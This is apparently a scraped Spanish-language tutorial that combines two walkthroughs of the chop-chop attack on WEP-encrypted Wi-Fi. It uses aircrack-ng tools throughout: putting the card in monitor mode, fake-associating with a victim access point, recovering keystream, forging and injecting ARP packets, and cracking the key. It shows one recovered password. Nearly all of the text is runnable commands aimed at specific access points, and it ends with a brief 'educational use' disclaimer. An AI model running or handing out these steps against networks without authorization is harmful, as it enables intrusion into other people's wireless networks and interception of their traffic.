Está en la página 1de 9

Ataque Chop-Chop a WEP

En este post les enseare como romper un cifrado WEP primero que todo miraremos como se llama nuestra interfaz de red inalambrica con el siguinte comando #iwconfig

Como podemos ver en la imagen anterior mi dispositvo se llama wlan0 lo siguiente que haremos es poner muestro dispostivo en modo promiscuo (modo monitor) #airmon-ng stop wlan0

#airmon-ng start wlan0

Ahora localizamos el AP #airodump-ng wlan0

Como podemos ver en la imagen anterior tenemos un AP con ESSID JONATHAN y usa el protocolo WEP #airodump-ng c 1 -w prueba -i wlan0

El siguiente paso es asociarnos contra el AP victima con el siguinte comando #aireplay-ng -1 0 -e JONATHAN -a 00:0A:56:9A:18:FB -h 00:E0:4C:04:03:47 wlan0

Ahora vamos a usar el ataque Chop-Chop #aireplay-ng -4 -h 00:E0:4C:04:03:47 -b 00:0A:56:9A:18:FB wlan0

Despues presionamos la tecla y

Ahora creamos una peticin de paquete arp usando el archivo .xor: #packetforge-ng -0 -a 00:0A:56:9A:18:FB -h 00:E0:4C:04:03:47 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0914-174512.xor -w arp-request

Ahora enviaremos el paquete ARP creado anteriormente #aireplay-ng -2 -h 00:E0:4C:04:03:47 -r arp-request wlan0

En la siguiente imagen podemos ver en la columna #Data Ya tenenemos los paquetes necesarios para poder lograr descifrar la contrasea

Ahora vamos a descifrar la contrasea con el siguiente comando aircrack-ng -n 64 -z -f 1 -e JONATHAN -b 00:0A:56:9A:18:FB prueba-02*.ivs

Como podemos ver en la imagen anterrior tenemos la contrasea en tipo ASCII y la contrasea es WALDO Este tipo de ataque es muy usado ya que el intruso no tiene que esperar a que un cliente esta autenticado en el AP. Toda la informacin aqu expuesta es para uso educativo y/o cientfico. Todo lo que hagas con estos programas es responsabilidad tuya.

Bueno, esta tutorial me basare para los que ya saben crackear una wep, as que no me molestare en explicar como crackear una wep en este tutorial y los que no tengan ninguna idea aqui en el foro hay de como hacerlo en tal caso, de no entender puedes preguntar o simplemente les puedo hacer un tutorial, pero creo que los que hay en el foro soy muy entendibles. Quedo aclarar que el distro que use no fue nada menos que backtrack 3 Final. Empecemos... 1.- checamos cual es nuestra interfase para poderlo en modo monitor: airmon-ng

2.- como sabemos ponemos nuestra interface en modo monitor: airmon-ng start <interface>

3.- ahora miramos que AP tenemos. airodump-ng <interface>

4.- Como vemos nos aparecen algunas as que seleccionamos una, en este caso seleccionare 2WIREXXX. airodump-ng c 6 -w lir -i <interface>

5.- Despus nos asociamos: aireplay-ng -1 0 -e 2WIRE -a 00:14:95:CE:2E:11 -h 00:11:22:33:44:55 <interface>

6.- Ahora procedemos hacer el ataque Chop-Chop: aireplay-ng -4 -b 00:14:95:CE:2E:11 -h 00:11:22:33:44:55 <interface>

Le ponemos yes

7.- Usamos tcpdump para poder mirar la ip que nos interesa. tcpdump -s 0 -n -e -r replay_dec-0920-161359.cap

8.- Creamos una peticin de paquete arp usando el archivo .xor: packetforge-ng -0 -a 00:14:95:ce:2e:11 -h 00:11:22:33:44:55 -k 192.168.1.140 -l 192.168.1.254 -y replay_dec-0920-161359.xor -w ddlr.cap

-l ip origen -k ip destino 9.- Finalmente enviamos el recien creado paquete de peticion arp: aireplay-ng -2 -r ddlr.cap <interfase> Le damos yes:

y empezara inyectar super rpido, te sorprenders de la velocidad. 10.- Finalmente sacamos el password: aircrack-ng lir-01.ivs

También podría gustarte